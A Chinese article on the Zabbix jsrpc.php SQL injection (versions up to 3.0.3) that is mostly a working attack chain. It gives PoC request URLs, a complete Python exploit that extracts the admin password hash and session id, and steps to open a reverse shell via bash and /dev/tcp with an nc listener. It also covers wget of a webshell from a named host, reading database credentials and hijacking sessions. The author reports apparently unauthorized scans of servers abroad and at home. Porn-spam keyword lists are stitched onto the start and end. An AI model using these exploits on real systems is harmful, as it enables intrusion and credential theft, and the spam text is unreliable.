精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

專家?guī)闾接慫abbix sql最新注入漏洞及其利用情況

原創(chuàng)
安全 黑客攻防 應(yīng)用安全
專家?guī)鷮崪yZabbix 漏洞,掌握其存在漏洞,其具體利用方法,了解其存在的危險。

   在企業(yè)和個人安全意識不斷增強(qiáng),對有安全防護(hù)的企業(yè)來說,滲透比過去相對困難一些,而一些對硬件、資產(chǎn)等管理平臺仍然存在弱口令等漏洞,一旦通過這些漏洞打開入口,將對企業(yè)安全造成巨大的威脅。Zabbix 是用得非常廣泛的網(wǎng)絡(luò)監(jiān)測軟件,其存在sql注入,聲稱可以獲取管理員密碼,雖然Zabbix 3.0.3以下版本存在漏洞,但如何利用,如何測試,您掌握了嗎?本文帶您實測Zabbix 漏洞,掌握其存在漏洞,其具體利用方法,了解其存在的危險。在本文初稿完成后,筆者對美國、韓國、我國安裝有zabbix的服務(wù)器進(jìn)行了安全測試,結(jié)果表明美國等西方國家,絕大部分服務(wù)器的zabbix漏洞已經(jīng)修復(fù),而我國在100臺服務(wù)器中高達(dá)60臺服務(wù)器未修護(hù)。在未修護(hù)的服務(wù)器中絕大部分已經(jīng)被人滲透過,最后希望通過本文,能加強(qiáng)大家對漏洞的風(fēng)險認(rèn)識,盡自己的一點(diǎn)微薄之力。

  1. Zabbix sql注入漏洞漏洞簡介

  Zabbix 是一個開源的企業(yè)級性能監(jiān)控解決方案。近日,Zabbix 的jsrpc的profileIdx2參數(shù)存在insert方式的SQL注入漏洞,攻擊者無需授權(quán)登陸即可登陸Zabbix 管理系統(tǒng),也可通過script等功能輕易直接獲取Zabbix 服務(wù)器的操作系統(tǒng)權(quán)限。Zabbix 2.2.x, 3.0.0-3.0.3版本存在該漏洞,可能導(dǎo)致敏感數(shù)據(jù)泄漏、服務(wù)器被惡意攻擊者控制進(jìn)而造成更多危害等,更多信息請訪問其官方網(wǎng)站為http://www.Zabbix .com獲取。

  2.漏洞原理與分析

  (1)高權(quán)限利用0day

  Zabbix 最新SQL注入漏洞于8月12日由安全研究員 1N3@CrowdShield 和 Brandon Perry 負(fù)責(zé)任地披露于 Full Disclosure(http://seclists.org/fulldisclosure/2016/Aug/82),其提供的poc為:

  http://www.antian365.com/latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1

  如果出現(xiàn)以下類似結(jié)果,則表明存在漏洞,該P(yáng)OC的前提必須是具備高權(quán)限用戶。

  

  1. SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (88, 1, 'web.latest.toggle''1', 2, 15385); 
  2. select * from users where (1=1) 
  3. latest.php:746 a require_once() a CProfile::flush() a CProfile::insertDB() a DBexecute() in /home/sasha/Zabbix -svn/branches/2.2/frontends/php/include/profiles.inc.php:185 

  Brandon Perry提供一個0day,經(jīng)測試效果不佳:  

  1. /Zabbix /jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471054088083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2'3297&updateProfile=true&screenitemid=&period=3600&stime=20170813040734&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1 

  在關(guān)閉 display_errors 的環(huán)境下看不到效果,建議使用一個 sleep 函數(shù),如果頁面阻塞很久才返回,那說明漏洞是存在的,新的 PoC 如下:

  1. /Zabbix /jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471054088083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2-sleep(10)&updateProfile=true&screenitemid=&period=3600&stime=20170813040734&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1 

  (2)低權(quán)限利用0day可獲取管理員加盟密碼

  Zabbix 提供了以guest用戶權(quán)限登錄系統(tǒng),登錄系統(tǒng)后按照以下進(jìn)行訪問:

  http://www.antian365.com/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2'3297&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1

  http://www.antian365.com為目標(biāo)站點(diǎn),如果存在漏洞則會給出如下錯誤信息:  

  1. <div class="flickerfreescreen" id="flickerfreescreen_1" data-timestamp="1471403798083" style="position: relative;"></div><table class="msgerr" cellpadding="0" cellspacing="0" id="msg_messages" style="width: 100%;"><tr><td class="msg" colspan="1"><ul class="messages"><li class="error">Error in query [INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (191, 2, 'web.item.graph.period', '3600', 2, 1 or updatexml(1,md5(0x11),1) or 11=1)#)] [XPATH syntax error: 'ed733b8d10be225eceba344d533586']</li><li class="error">Error in query [INSERT INTO profiles (profileid, userid, idx, value_str, type, idx2) VALUES (192, 2, 'web.item.graph.stime', '20160817050632', 3, 1 or updatexml(1,md5(0x11),1) or 11=1)#)] [XPATH syntax error: 'ed733b8d10be225eceba344d533586']</li><li class="error">Error in query [INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (193, 2, 'web.item.graph.isnow', '0', 2, 1 or updatexml(1,md5(0x11),1) or 11=1)#)] [XPATH syntax error: 'ed733b8d10be225eceba344d533586']</li></ul></td></tr></table> 
 

  其中ed733b8d10be225eceba344d533586為管理員的密碼,經(jīng)過核實該密碼目前無法破解,且肯定不是管理員密碼,很多Zabbix 缺省配置Admin密碼Zabbix ,其md5密碼值為5fce1b3e34b520afeffb37ce08c7cd66,如圖1所示,Zabbix 實際md5值。而Guset用戶的密碼值為:d41d8cd98f00b204e9800998ecf8427e,也就是網(wǎng)上公開聲稱的可以獲取管理員的密碼那個0day的POC存在錯誤。

圖1 Zabbix 密碼解密

  (3)存在注入點(diǎn)分析

  在漏洞文件jsrpc.php中: 

  1. $requestType = getRequest('type', PAGE_TYPE_JSON); 
  2. if ($requestType == PAGE_TYPE_JSON) { 
  3. $http_request = new CHttpRequest(); 
  4. $json = new CJson(); 
  5. $data = $json->decode($http_request->body(), true); 
  6. else { 
  7. $data = $_REQUEST
  8. $page['title'] = 'RPC'
  9. $page['file'] = 'jsrpc.php'
  10. $page['type'] = detect_page_type($requestType); 
  11. require_once dirname(__FILE__).'/include/page_header.php'
  12. if (!is_array($data) || !isset($data['method']) 
  13. || ($requestType == PAGE_TYPE_JSON && (!isset($data['params']) || !is_array($data['params'])))) { 
  14. fatal_error('Wrong RPC call to JS RPC!'); 
  15. $result = []; 
  16. switch ($data['method']) { 
  17. ... 
  18. case 'screen.get'
  19. $result = ''
  20. $screenBase = CScreenBuilder::getScreen($data); 
  21. if ($screenBase !== null) { 
  22. $screen = $screenBase->get(); 
  23. if ($data['mode'] == SCREEN_MODE_JS) { 
  24. $result = $screen
  25. if (is_object($screen)) { 
  26. $result = $screen->toString(); 
  27. ... 
  28. require_once dirname(__FILE__).'/include/page_footer.php'

  通過類 CScreenBuilder 中的 getScreen 方法處理 $data 傳入的數(shù)據(jù)。繼續(xù)跟蹤 CScreenBuilder 類:  

  1. /** 
  2. * Init screen data. 
  3. * 
  4. * @param array$options 
  5. * @param boolean$options['isFlickerfree'] 
  6. * @param string$options['pageFile'] 
  7. * @param int$options['mode'] 
  8. * @param int$options['timestamp'] 
  9. * @param int$options['hostid'] 
  10. * @param int$options['period'] 
  11. * @param int$options['stime'] 
  12. * @param string$options['profileIdx'] 
  13. * @param int$options['profileIdx2'] 
  14. * @param boolean$options['updateProfile'] 
  15. * @param array$options['screen'] 
  16. */ 
  17. public function __construct(array $options = []) { 
  18. $this->isFlickerfree = isset($options['isFlickerfree']) ? $options['isFlickerfree'] : true; 
  19. $this->mode = isset($options['mode']) ? $options['mode'] : SCREEN_MODE_SLIDESHOW; 
  20. $this->timestamp = !emptyempty($options['timestamp']) ? $options['timestamp'] : time(); 
  21. $this->hostid = !emptyempty($options['hostid']) ? $options['hostid'] : null; 
  22. // get page file 
  23. if (!emptyempty($options['pageFile'])) { 
  24. $this->pageFile = $options['pageFile']; 
  25. else { 
  26. global $page
  27. $this->pageFile = $page['file']; 
  28. // get screen 
  29. if (!emptyempty($options['screen'])) { 
  30. $this->screen = $options['screen']; 
  31. elseif (array_key_exists('screenid'$options) && $options['screenid'] > 0) { 
  32. $this->screen = API::Screen()->get([ 
  33. 'screenids' => $options['screenid'], 
  34. 'output' => API_OUTPUT_EXTEND, 
  35. 'selectScreenItems' => API_OUTPUT_EXTEND, 
  36. 'editable' => ($this->mode == SCREEN_MODE_EDIT) 
  37. ]); 
  38. if (!emptyempty($this->screen)) { 
  39. $this->screen = reset($this->screen); 
  40. else { 
  41. access_deny(); 
  42. // calculate time 
  43. $this->profileIdx = !emptyempty($options['profileIdx']) ? $options['profileIdx'] : ''
  44. $this->profileIdx2 = !emptyempty($options['profileIdx2']) ? $options['profileIdx2'] : null; 
  45. $this->updateProfile = isset($options['updateProfile']) ? $options['updateProfile'] : true; 
  46. $this->timeline = CScreenBase::calculateTime([ 
  47. 'profileIdx' => $this->profileIdx, 
  48. 'profileIdx2' => $this->profileIdx2, 
  49. 'updateProfile' => $this->updateProfile, 
  50. 'period' => !emptyempty($options['period']) ? $options['period'] : null, 
  51. 'stime' => !emptyempty($options['stime']) ? $options['stime'] : null 
  52. ]); 

  CScreenBuilder 類對 $profiles 進(jìn)行了更新,并且對 PoC 中的 profileIdx2 參數(shù)進(jìn)行了賦值,但還沒有傳入數(shù)據(jù)庫查詢。

  漏洞文件 jsrpc.php 中引入了 page_footer.php, page_footer.php會調(diào)用Cprofile 類:

  1. if (CProfile::isModified()) { 
  2. DBstart(); 
  3. $result = CProfile::flush(); 
  4. DBend($result); 

  跟蹤 flush 函數(shù):

  1. public static function flush() { 
  2. $result = false; 
  3. if (self::$profiles !== null && self::$userDetails['userid'] > 0 && self::isModified()) { 
  4. $result = true; 
  5. foreach (self::$insert as $idx => $profile) { 
  6. foreach ($profile as $idx2 => $data) { 
  7. $result &= self::insertDB($idx$data['value'], $data['type'], $idx2); 
  8. ksort(self::$update); 
  9. foreach (self::$update as $idx => $profile) { 
  10. ksort($profile); 
  11. foreach ($profile as $idx2 => $data) { 
  12. $result &= self::updateDB($idx$data['value'], $data['type'], $idx2); 
  13. return $result
  14. ... 
  15. private static function insertDB($idx$value$type$idx2) { 
  16. $value_type = self::getFieldByType($type); 
  17. $values = [ 
  18. 'profileid' => get_dbid('profiles''profileid'), 
  19. 'userid' => self::$userDetails['userid'], 
  20. 'idx' => zbx_dbstr($idx), 
  21. $value_type => zbx_dbstr($value), 
  22. 'type' => $type
  23. 'idx2' => $idx2 
  24. ]; 

   //注入觸發(fā)點(diǎn)

  1. return DBexecute('INSERT INTO profiles ('.implode(', ', array_keys($values)).') VALUES ('.implode(', ', $values).')'); 

  至此,SQL注入產(chǎn)生 。

  (4)可供利用的exp

  在獨(dú)自等待的博客上面找到一個python的exp(http://www.waitalone.cn/Zabbix -sql-1.html)通過實際測試可以順利獲取管理員密碼以及session,如圖2所示,利用方法為: 

  1. python Zabbix .py http://114.111.111.1:81 

  

圖2 獲取Zabbix 管理員密碼

  將以下代碼保存為zabbix.py即可:  

  1. #!/usr/bin/env python 
  2. # -*- coding: gbk -*- 
  3. # -*- coding: utf_8 -*- 
  4. # Date: 2016/8/18 
  5. # Created by 獨(dú)自等待 
  6. # 博客 http://www.waitalone.cn/ 
  7. import urllib2 
  8. import sys, os 
  9. import re 
  10. def deteck_Sql(): 
  11.     u'檢查是否存在SQL注入' 
  12.     payload = "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1" 
  13.     try
  14.         response = urllib2.urlopen(url + payload, timeout=10).read() 
  15.     except Exception, msg: 
  16.         print msg 
  17.     else
  18.         key_reg = re.compile(r"INSERT\s*INTO\s*profiles"
  19.         if key_reg.findall(response): 
  20.             return True 
  21. def sql_Inject(sql): 
  22.     u'獲取特定sql語句內(nèi)容' 
  23.     payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote( 
  24.         sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1" 
  25.     try
  26.         response = urllib2.urlopen(payload, timeout=10).read() 
  27.     except Exception, msg: 
  28.         print msg 
  29.     else
  30.         result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1"
  31.         results = result_reg.findall(response) 
  32.         if results: 
  33.             return results[0
  34. if __name__ == '__main__'
  35.     # os.system(['clear', 'cls'][os.name == 'nt']) 
  36.     print '+' + '-' * 60 + '+' 
  37.     print '\t   Python Zabbix<3.0.4 SQL注入 Exploit' 
  38.     print '\t    Blog:http://www.waitalone.cn/' 
  39.     print '\t\t   Code BY: 獨(dú)自等待' 
  40.     print '\t\t   Time:2016-08-18' 
  41.     print '+' + '-' * 60 + '+' 
  42.     if len(sys.argv) != 2
  43.         print '用法: ' + os.path.basename(sys.argv[0]) + ' Zabbix 網(wǎng)站地址' 
  44.         print '實例: ' + os.path.basename(sys.argv[0]) + ' http://www.waitalone.cn/' 
  45.         sys.exit() 
  46.     url = sys.argv[1
  47.     if url[-1] != '/': url += '/' 
  48.     passwd_sql = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select concat(name,0x3a,passwd) from  users limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" 
  49.     session_sql = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select sessionid from sessions limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" 
  50.     if deteck_Sql(): 
  51.         print u'Zabbix 存在SQL注入漏洞!\n' 
  52.         print u'管理員  用戶名密碼:%s' % sql_Inject(passwd_sql) 
  53.         print u'管理員  Session_id:%s' % sql_Inject(session_sql) 
  54.     else
  55.         print u'Zabbix 不存在SQL注入漏洞!\n' 

  3.漏洞實際利用方法探討

  對Zabbix 漏洞的實際利用是指在獲取管理員密碼后,通過管理中心添加腳本,執(zhí)行腳本命令來獲取反彈shell,通過shell來提權(quán)或者執(zhí)行其它操作。

  (1)獲取管理員密碼

  Zabbix SQL注入漏洞可以很方便的獲取管理員的密碼,通過exp直接可以獲取管理員密碼,另外一種方法就是暴力破解,Zabbix 默認(rèn)管理員賬號Admin/zabbix 、admin/zabbix 。Zabbix sql注入漏洞獲取管理員密碼exp下載地址http://www.antian365.com/forum.php?mod=viewthread&tid=629&extra=

  (2)創(chuàng)建腳本

  登錄系統(tǒng)后,單擊“管理”-“腳本”-“創(chuàng)建腳本”,如果是英文,則是Administration- Scripts-Create Scripts。如圖3所示。在名稱中隨便輸入一個,例如cat,在命令中輸入“bash -i >& /dev/tcp/122.11x.47.xx/4433 0>&1”,其中的122.11x.47.xx為監(jiān)聽的獨(dú)立IP的服務(wù)器。

圖3創(chuàng)建反彈腳本

  (3)執(zhí)行腳本命令

  在執(zhí)行腳本命令前,需要在監(jiān)聽服務(wù)器上使用“nc –vv –l –p 4433”監(jiān)聽4433端口,完畢后,在Zabbix 管理主界面,單擊“監(jiān)測中”,然后單擊主機(jī)列表下的服務(wù)器,右鍵彈出的菜單中選擇剛才創(chuàng)建的命令,如圖4所示,選擇剛才創(chuàng)建的腳本執(zhí)行即可,執(zhí)行成功后會成功獲取的反彈的shell,如圖5所示。

  圖4執(zhí)行命令

  圖5獲取反彈的shell

  (4)查看配置文件并獲取webshell

  獲取終端shell后,可以通過locate *.php或者find –name “.php”命令查找php文件所在具體位置,到該目錄后,如果可寫,則通過wget http://www.antian365.com/shell.txt命令下載webshell到本地,并執(zhí)行chmod +x shell.txt命令給shell.txt文件可執(zhí)行權(quán)限,最后將該文件重命名為php文件即可,如圖6所示,成功獲取webshell。

圖6獲取webshell

  如果網(wǎng)站當(dāng)前用戶權(quán)限為root,則可以通過讀取conf/Zabbix .conf文件讀取配置文件內(nèi)容,如圖7所示,可以獲取數(shù)據(jù)庫用戶和密碼。

圖7讀取配置文件內(nèi)容

  (5)linux提權(quán)

  在實際測試過程中,有部分服務(wù)器是采用root賬號,絕大部分是Zabbix 賬號,也就是普通用戶,對于linux提權(quán),需要查看其相應(yīng)的內(nèi)核版本或者應(yīng)用程序存在漏洞,根據(jù)相應(yīng)的漏洞進(jìn)行編譯和執(zhí)行,如果存在漏洞則可以獲取root權(quán)限,反之則無法提權(quán)。

  (6)在zabbix還可以通過sessionid進(jìn)行登錄

  使用Tamper插件,開啟Tamper插件,在抓取到的包中,通過修改zbx_sessionid值為SQL注入獲取的sessionid值,提交即可進(jìn)入后臺,如圖8,圖9所示。這種情況主要適合無法破解zabbix通過注入獲取到的md5密碼。

  圖8修改zbx_sessionid值

  圖9成功登錄后臺

  4.在線網(wǎng)站漏洞檢測

  (1)https://www.vulbox.com/lab

  (2)https://cloud.nsfocus.com/#/krosa/views/initcdr/productandservice?service_id=1026

  5、漏洞修復(fù)方案

  (1)將當(dāng)前版本升級到最新版本,補(bǔ)丁更新ttps://support.Zabbix .com/browse/ZBX-11023

  (2)打補(bǔ)丁

  (3)關(guān)閉guest賬號,或者直接將guest賬號刪除。

責(zé)任編輯:周雪 來源: 51CTO.com
相關(guān)推薦

2025-01-02 14:21:20

2024-12-04 13:33:43

2023-05-06 11:05:50

2015-02-10 13:24:27

CSRF漏洞CSRF

2014-02-28 17:29:06

2017-05-02 09:02:14

2010-10-22 15:18:18

SQL注入漏洞

2009-02-12 10:14:16

2024-05-29 14:43:34

2009-10-25 13:32:09

2009-11-02 13:47:09

2021-09-16 09:05:45

SQL注入漏洞網(wǎng)絡(luò)攻擊

2013-12-20 09:46:56

Hadoop大數(shù)據(jù)數(shù)據(jù)處理

2017-09-07 15:39:27

2017-08-09 17:09:47

2013-11-18 09:44:02

2015-03-23 12:26:49

2023-11-06 13:11:15

2018-03-29 10:16:04

2014-12-04 15:01:13

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號

中文字幕av网站| 91精品视频国产| 国产视频第一页在线观看| 国产日韩欧美一区在线| 亚洲色在线视频| 国产v亚洲v天堂无码久久久| 日本激情在线观看| 成人综合在线视频| 青青青国产精品一区二区| 青青草福利视频| www.成人| 欧美性色视频在线| 中文字幕日韩精品久久| 少妇荡乳情欲办公室456视频| 老**午夜毛片一区二区三区| 成年人精品视频| 黄色a一级视频| 中文成人在线| 日韩欧美精品中文字幕| 日本美女爱爱视频| 成年人免费在线视频| 成人精品免费看| 国产欧美日韩91| 久久亚洲精品国产| 欧美.日韩.国产.一区.二区| 亚洲欧美日韩天堂| 中文字幕人妻熟女人妻a片| 美女18一级毛片一品久道久久综合| 亚洲欧洲国产日韩| 欧美亚洲精品日韩| 国产深喉视频一区二区| 久久狠狠一本精品综合网| 色综合老司机第九色激情| 日韩福利在线视频| 亚洲精品国产精品粉嫩| 精品国产一区二区三区四区四| 亚洲欧美日韩一级| 中文在线免费二区三区| 亚洲大片精品永久免费| 欧美a级黄色大片| 亚洲视频tv| 国产色产综合产在线视频| 韩国一区二区三区美女美女秀| 99国产精品欲| 黄一区二区三区| 国产精品美女主播在线观看纯欲| 成人在线免费看视频| 影音先锋久久精品| 色综合五月天导航| 久久高清无码视频| 亚洲欧美日韩高清在线| 日韩中文字幕在线视频播放| 中国特黄一级片| 成人激情在线| 中文字幕精品在线| 四季av中文字幕| 欧美亚洲国产一区| 中文字幕亚洲无线码a| 亚洲永久精品ww.7491进入| 日本午夜精品| 亚洲欧美中文日韩在线| 男人天堂av电影| 精品免费视频| 色偷偷av一区二区三区乱| 亚洲av无一区二区三区| 香蕉视频国产精品 | 成人欧美一区二区三区在线湿哒哒| 在线观看黄网站| 国产精品久久久一区二区| 91成人在线观看国产| 中文字幕一区在线播放| 天使萌一区二区三区免费观看| 日韩男女性生活视频| 羞羞色院91蜜桃| 久久99国产精品久久99果冻传媒| 国产在线久久久| av在线免费在线观看| 国产精品自在在线| 国产综合精品一区二区三区| 久久久久久女乱国产| 亚洲国产精品激情在线观看| 亚洲欧洲日韩综合二区| 2021国产在线| 亚洲成人免费视频| www.日日操| 91精品网站在线观看| 精品久久久久99| 97人妻精品一区二区免费| 欧美手机在线| 欧美激情中文字幕在线| 海角国产乱辈乱精品视频| 亚洲另类第一页| 欧美经典影片视频网站| 69堂精品视频| jlzzjizz在线播放观看| 精品国产视频| 欧美猛交免费看| 一区二区三区福利视频| 久久福利视频一区二区| 国产精品乱码一区二区三区| 日本视频在线观看一区二区三区 | 99在线观看视频网站| 五月婷婷开心中文字幕| 国产精品美女视频| 福利视频免费在线观看| 高清亚洲高清| 欧美精品一区视频| 91视频免费看片| 亚洲美女视频在线免费观看| 国产在线精品播放| 午夜视频福利在线观看| 国产精品久久精品日日| 男女视频网站在线观看| 国产成人免费| 欧美精品一区二区三区蜜桃视频| 人妻aⅴ无码一区二区三区| 国产精品分类| 国产美女精品免费电影| 亚州精品国产精品乱码不99按摩| 中文字幕一区二区在线播放| 六月丁香婷婷激情| 亚洲视频国产| 日韩在线视频国产| 天天干天天操天天操| 成人福利在线看| 欧美a级黄色大片| 草民电影神马电影一区二区| 日韩www在线| 久久久久久久久97| 国产中文一区二区三区| 色姑娘综合网| 电影一区二区三区| 亚洲国产精彩中文乱码av在线播放| 亚洲女人毛茸茸高潮| 香蕉久久国产| 久久99精品国产一区二区三区| 97影院秋霞午夜在线观看| 欧美天天综合网| 中文字幕第4页| 国产人成精品一区二区三| 国产精品区二区三区日本| 最新国产露脸在线观看| 欧美男同性恋视频网站| 中文字幕在线观看二区| 免费在线欧美视频| 热舞福利精品大尺度视频| 在线观看涩涩| 亚洲女人被黑人巨大进入| 日韩av在线播| av午夜精品一区二区三区| 欧美国产日韩激情| 精品国产乱子伦一区二区| 久久久久久久999| 亚洲精品一区二区三区区别 | 国产精品黄色网| 波波电影院一区二区三区| 成人性免费视频| 老司机成人在线| 97久久伊人激情网| 色在线免费视频| 色狠狠色噜噜噜综合网| 人妻av无码一区二区三区| 日韩和欧美一区二区| 日韩欧美电影一区二区| 九九热这里有精品| 久久精品亚洲一区| 亚洲av无码一区二区三区dv| 亚洲午夜av在线| 精品一区二区视频在线观看| 亚洲一区二区毛片| 日本高清不卡三区| 九九九伊在线综合永久| www亚洲欧美| 亚洲av少妇一区二区在线观看| 亚洲一二三区视频在线观看| 99久久人妻无码中文字幕系列| av不卡在线| 日韩欧美在线电影| 精品中文视频| 97精品国产97久久久久久免费| 青青国产在线| 欧美精品三级日韩久久| 久久久久久国产精品视频| 久久影院视频免费| 中文字幕 欧美日韩| 狠狠入ady亚洲精品| 你懂的视频在线一区二区| 国产欧美在线观看免费| 久久久久成人精品| 国产中文在线| 91精品国产一区二区人妖| 国产真实乱偷精品视频| 久久九九影视网| 亚洲一区二区偷拍| 国产亚洲午夜| 国产精品jizz在线观看老狼| 国内精品麻豆美女在线播放视频| 国产999精品久久久| 在线中文字幕-区二区三区四区| 亚洲第一精品电影| 一级特黄aaa| 午夜激情一区二区三区| 日本一级片免费| xnxx国产精品| 三级网站免费看| 日韩电影在线一区二区三区| 黄色激情在线视频| 四季av一区二区三区免费观看| 国产欧美日韩亚洲| 北岛玲精品视频在线观看| 欧美亚洲在线视频| 污污片在线免费视频| 中文字幕成人精品久久不卡| 婷婷丁香花五月天| 91精品国产欧美日韩| 国产一区二区视频网站| 亚洲国产精品影院| 黄色香蕉视频在线观看| 国产欧美视频在线观看| 折磨小男生性器羞耻的故事| 激情六月婷婷久久| 午夜激情在线观看视频| 亚洲一区网站| 岛国大片在线播放| 欧美日韩精品一本二本三本| 一卡二卡3卡四卡高清精品视频| 偷拍自拍亚洲色图| 国产精品免费一区二区三区观看| 国产日韩一区二区三免费高清| 国产精品88a∨| 澳门成人av网| 91精品国产99久久久久久| 国产天堂在线播放视频| 久热99视频在线观看| 欧美被日视频| 色综合伊人色综合网| 在线毛片网站| 少妇高潮 亚洲精品| se在线电影| 国产一区二区激情| 精品久久av| 亚洲欧美国产日韩天堂区| 涩涩视频在线观看免费| 亚洲精品乱码久久久久久金桔影视| 亚洲av永久无码国产精品久久 | 欧美偷拍综合| 日韩av一区二区三区美女毛片| 夜夜躁狠狠躁日日躁2021日韩| 精品福利影视| 日韩av影院| 久热国产精品视频一区二区三区| 久久人人爽人人爽人人片av不| 国产精品成人一区二区三区| 国产精品18hdxxxⅹ在线| av免费精品一区二区三区| 99久久香蕉| 精品国产一区二区三区免费| 欧美激情15p| 欧美日韩在线一区二区三区| 精品久久影视| 在线免费一区| 午夜性色一区二区三区免费视频| 午夜久久久久久久久久久| 雨宫琴音一区二区在线| 日本www在线视频| 麻豆精品网站| 日本xxxx黄色| 国产最新精品精品你懂的| 性折磨bdsm欧美激情另类| 成人美女在线视频| 自拍偷拍中文字幕| 中文字幕制服丝袜成人av | 亚洲精品成人| 隔壁人妻偷人bd中字| 羞羞答答国产精品www一本| 久草福利视频在线| 国产一区亚洲一区| 五月天丁香社区| 久久亚洲欧美国产精品乐播| 亚洲图片第一页| 一区二区三区免费在线观看| 日韩在线观看第一页| 在线国产电影不卡| av中文字幕第一页| 亚洲精品在线视频| 成人在线播放| 4444欧美成人kkkk| 日韩一级特黄| 国产综合18久久久久久| 日韩欧美综合| 青青在线免费观看| 日韩不卡一区二区| zjzjzjzjzj亚洲女人| 国产欧美一区二区在线| 国产十六处破外女视频| 色呦呦日韩精品| www日本高清| 亚洲午夜未删减在线观看| www在线免费观看视频| 欧美中文在线观看| 日本99精品| 日韩欧美一区二区视频在线播放| 国产精品xvideos88| 我看黄色一级片| 成人黄色在线视频| 国产精品suv一区二区88| 五月婷婷激情综合| av男人天堂网| 亚洲色图在线观看| 成人观看网址| 亚洲一区二区三区视频| 精品亚洲成人| 北条麻妃在线视频观看| 国产一区免费电影| 日本少妇xxxxx| 亚洲成人自拍偷拍| 国产sm主人调教女m视频| 亚洲色图狂野欧美| 在线观看的黄色| 成人做爰66片免费看网站| 欧美国产偷国产精品三区| 精品人妻一区二区三区四区在线| 国产一区999| 国产又粗又猛又爽又黄的视频四季 | 国产精品国模大尺度私拍| 日韩精品诱惑一区?区三区| 国产淫片免费看| 成人精品亚洲人成在线| 51精品免费网站| 欧美日韩一区二区三区免费看 | 日韩在线资源网| 亚洲第一二三四区| 久久精品国产一区二区三区不卡| 中文无码久久精品| 国产精品视频中文字幕| 久久精品人人做人人爽97| 国产九色在线播放九色| 亚洲国产高清自拍| av日韩国产| 国产精品福利视频| 亚洲网址在线| 欧美午夜精品一区二区| 一区二区视频在线看| 国产精品自拍电影| www.日韩欧美| 成人日韩视频| 欧美精品一区二区性色a+v| 久久99国产精品免费| 久草手机视频在线观看| 欧美嫩在线观看| 制服丝袜中文字幕在线| 亚洲综合一区二区不卡| 午夜国产欧美理论在线播放| 91亚洲一区二区| 亚洲激情欧美激情| 亚洲男人天堂久久| 久久久视频在线| 精品中国亚洲| 欧美三级午夜理伦三级| 国产调教视频一区| 久久久久久av无码免费看大片| 中文字幕欧美日韩精品| 亚洲二区av| 黄色三级中文字幕| 99久久免费精品| 精品人妻一区二区三区免费看| 亚洲人成电影网| 日韩美女在线| 99久久久精品视频| 99久久综合狠狠综合久久| 国产美女www| 日韩中文字幕第一页| 麻豆国产一区| 黄页网站大全在线观看| 久久久国产一区二区三区四区小说 | 无码国产精品一区二区免费式直播| 亚洲国产乱码最新视频 | 久久综合九色欧美综合狠狠| 一级黄色av片| 久久久国产视频| 激情av综合| 色哟哟精品视频| 一区二区三区四区激情| 天堂a√在线| 国产精品mp4| 欧美91视频| 9.1成人看片免费版| 欧美裸体bbwbbwbbw| 女人天堂av在线播放| 欧美日韩精品免费看 | 91麻豆国产语对白在线观看| 影音先锋一区| 成人性生交大片免费看无遮挡aⅴ| 正在播放亚洲一区| 成人午夜视屏| 浴室偷拍美女洗澡456在线| 2020国产成人综合网| 国产又爽又黄又嫩又猛又粗| 91av成人在线| 亚洲精品a级片|